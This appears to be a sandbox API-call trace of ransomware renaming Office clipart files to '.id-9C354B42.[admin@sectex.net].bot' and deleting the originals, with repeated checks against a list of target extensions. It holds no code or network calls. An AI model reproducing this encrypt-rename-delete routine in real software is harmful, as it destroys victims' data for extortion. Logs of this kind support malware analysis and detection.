	[0145.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.266] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.266] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.266] GetLastError () returned 0x0
	[0145.266] ReadFile (in: hFile=0x3c0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x8fc, lpOverlapped=0x0) returned 1
	[0145.268] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x900, lpOverlapped=0x0) returned 1
	[0145.268] ReadFile (in: hFile=0x3c0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.269] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.269] SetEndOfFile (hFile=0x38c) returned 1
	[0145.269] CloseHandle (hObject=0x38c) returned 1
	[0145.269] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.269] SetEndOfFile (hFile=0x3c0) returned 1
	[0145.271] CloseHandle (hObject=0x3c0) returned 1
	[0145.271] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.271] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf")) returned 1
	[0145.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63
	[0145.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63
	[0145.272] lstrlenW (lpString=".doc") returned 4
	[0145.272] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.272] lstrlenW (lpString=".docx") returned 5
	[0145.272] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.272] lstrlenW (lpString=".pdf") returned 4
	[0145.272] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.272] lstrlenW (lpString=".xls") returned 4
	[0145.272] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.272] lstrlenW (lpString=".xlsx") returned 5
	[0145.272] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.272] lstrlenW (lpString=".ppt") returned 4
	[0145.272] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63
	[0145.272] lstrlenW (lpString=".zip") returned 4
	[0145.272] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.272] lstrlenW (lpString=".rar") returned 4
	[0145.272] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.272] lstrlenW (lpString=".bz2") returned 4
	[0145.272] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.272] lstrlenW (lpString=".7z") returned 3
	[0145.272] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63
	[0145.272] lstrlenW (lpString=".dbf") returned 4
	[0145.272] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63
	[0145.272] lstrlenW (lpString=".1cd") returned 4
	[0145.272] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63
	[0145.272] lstrlenW (lpString=".jpg") returned 4
	[0145.272] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63
	[0145.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63
	[0145.273] lstrlenW (lpString=".doc") returned 4
	[0145.273] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.273] lstrlenW (lpString=".docx") returned 5
	[0145.273] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.273] lstrlenW (lpString=".pdf") returned 4
	[0145.273] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.273] lstrlenW (lpString=".xls") returned 4
	[0145.273] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.273] lstrlenW (lpString=".xlsx") returned 5
	[0145.273] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.273] lstrlenW (lpString=".ppt") returned 4
	[0145.273] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63
	[0145.273] lstrlenW (lpString=".zip") returned 4
	[0145.273] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.273] lstrlenW (lpString=".rar") returned 4
	[0145.273] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.273] lstrlenW (lpString=".bz2") returned 4
	[0145.273] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.273] lstrlenW (lpString=".7z") returned 3
	[0145.273] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63
	[0145.273] lstrlenW (lpString=".dbf") returned 4
	[0145.273] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63
	[0145.273] lstrlenW (lpString=".1cd") returned 4
	[0145.273] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63
	[0145.273] lstrlenW (lpString=".jpg") returned 4
	[0145.273] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.274] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.274] lstrlenW (lpString="DD01793_.WMF") returned 12
	[0145.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.274] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3252) returned 1
	[0145.483] CloseHandle (hObject=0x3c0) returned 1
	[0145.483] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf")) returned 0x20
	[0145.548] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0145.579] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.579] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.580] GetLastError () returned 0x0
	[0145.580] ReadFile (in: hFile=0x3a0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xcb4, lpOverlapped=0x0) returned 1
	[0145.581] WriteFile (in: hFile=0x3d4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xcc0, lpOverlapped=0x0) returned 1
	[0145.582] ReadFile (in: hFile=0x3a0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.582] WriteFile (in: hFile=0x3d4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.583] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.583] CloseHandle (hObject=0x3d4) returned 1
	[0145.583] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.583] SetEndOfFile (hFile=0x3a0) returned 1
	[0145.585] CloseHandle (hObject=0x3a0) returned 1
	[0145.585] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.585] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf")) returned 1
	[0145.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63
	[0145.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63
	[0145.586] lstrlenW (lpString=".doc") returned 4
	[0145.586] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.586] lstrlenW (lpString=".docx") returned 5
	[0145.586] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.586] lstrlenW (lpString=".pdf") returned 4
	[0145.586] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.586] lstrlenW (lpString=".xls") returned 4
	[0145.586] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.586] lstrlenW (lpString=".xlsx") returned 5
	[0145.586] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.586] lstrlenW (lpString=".ppt") returned 4
	[0145.586] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63
	[0145.586] lstrlenW (lpString=".zip") returned 4
	[0145.586] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.586] lstrlenW (lpString=".rar") returned 4
	[0145.586] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.586] lstrlenW (lpString=".bz2") returned 4
	[0145.586] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.587] lstrlenW (lpString=".7z") returned 3
	[0145.587] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63
	[0145.587] lstrlenW (lpString=".dbf") returned 4
	[0145.587] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63
	[0145.587] lstrlenW (lpString=".1cd") returned 4
	[0145.587] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63
	[0145.587] lstrlenW (lpString=".jpg") returned 4
	[0145.587] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63
	[0145.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63
	[0145.587] lstrlenW (lpString=".doc") returned 4
	[0145.587] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.587] lstrlenW (lpString=".docx") returned 5
	[0145.587] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.587] lstrlenW (lpString=".pdf") returned 4
	[0145.587] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.587] lstrlenW (lpString=".xls") returned 4
	[0145.587] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.587] lstrlenW (lpString=".xlsx") returned 5
	[0145.587] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.587] lstrlenW (lpString=".ppt") returned 4
	[0145.587] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63
	[0145.587] lstrlenW (lpString=".zip") returned 4
	[0145.587] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.587] lstrlenW (lpString=".rar") returned 4
	[0145.587] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.587] lstrlenW (lpString=".bz2") returned 4
	[0145.587] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.587] lstrlenW (lpString=".7z") returned 3
	[0145.588] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63
	[0145.588] lstrlenW (lpString=".dbf") returned 4
	[0145.588] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63
	[0145.588] lstrlenW (lpString=".1cd") returned 4
	[0145.588] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63
	[0145.588] lstrlenW (lpString=".jpg") returned 4
	[0145.588] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.588] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.588] lstrlenW (lpString="EN00320_.WMF") returned 12
	[0145.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0145.588] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=736) returned 1
	[0145.588] CloseHandle (hObject=0x3a0) returned 1
	[0145.589] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf")) returned 0x20
	[0145.589] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0145.590] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.590] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.592] GetLastError () returned 0x0
	[0145.592] ReadFile (in: hFile=0x3a0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2e0, lpOverlapped=0x0) returned 1
	[0145.593] WriteFile (in: hFile=0x3d4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2f0, lpOverlapped=0x0) returned 1
	[0145.594] ReadFile (in: hFile=0x3a0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.594] WriteFile (in: hFile=0x3d4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.594] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.595] CloseHandle (hObject=0x3d4) returned 1
	[0145.595] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.595] SetEndOfFile (hFile=0x3a0) returned 1
	[0145.597] CloseHandle (hObject=0x3a0) returned 1
	[0145.597] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.597] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf")) returned 1
	[0145.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63
	[0145.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63
	[0145.598] lstrlenW (lpString=".doc") returned 4
	[0145.598] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.598] lstrlenW (lpString=".docx") returned 5
	[0145.598] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.598] lstrlenW (lpString=".pdf") returned 4
	[0145.598] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.598] lstrlenW (lpString=".xls") returned 4
	[0145.598] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.598] lstrlenW (lpString=".xlsx") returned 5
	[0145.598] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.598] lstrlenW (lpString=".ppt") returned 4
	[0145.598] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63
	[0145.598] lstrlenW (lpString=".zip") returned 4
	[0145.598] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.598] lstrlenW (lpString=".rar") returned 4
	[0145.598] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.598] lstrlenW (lpString=".bz2") returned 4
	[0145.598] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.598] lstrlenW (lpString=".7z") returned 3
	[0145.598] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63
	[0145.598] lstrlenW (lpString=".dbf") returned 4
	[0145.598] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63
	[0145.598] lstrlenW (lpString=".1cd") returned 4
	[0145.598] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63
	[0145.599] lstrlenW (lpString=".jpg") returned 4
	[0145.599] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63
	[0145.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63
	[0145.599] lstrlenW (lpString=".doc") returned 4
	[0145.599] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.599] lstrlenW (lpString=".docx") returned 5
	[0145.599] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.599] lstrlenW (lpString=".pdf") returned 4
	[0145.599] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.599] lstrlenW (lpString=".xls") returned 4
	[0145.599] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.599] lstrlenW (lpString=".xlsx") returned 5
	[0145.599] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.599] lstrlenW (lpString=".ppt") returned 4
	[0145.599] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63
	[0145.599] lstrlenW (lpString=".zip") returned 4
	[0145.599] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.599] lstrlenW (lpString=".rar") returned 4
	[0145.599] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.599] lstrlenW (lpString=".bz2") returned 4
	[0145.599] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.599] lstrlenW (lpString=".7z") returned 3
	[0145.599] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63
	[0145.599] lstrlenW (lpString=".dbf") returned 4
	[0145.599] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63
	[0145.599] lstrlenW (lpString=".1cd") returned 4
	[0145.599] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63
	[0145.599] lstrlenW (lpString=".jpg") returned 4
	[0145.600] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.600] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.600] lstrlenW (lpString="EN00397_.WMF") returned 12
	[0145.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00397_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0145.600] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=17308) returned 1
	[0145.600] CloseHandle (hObject=0x3a0) returned 1
	[0145.600] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00397_.wmf")) returned 0x20
	[0145.601] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00397_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
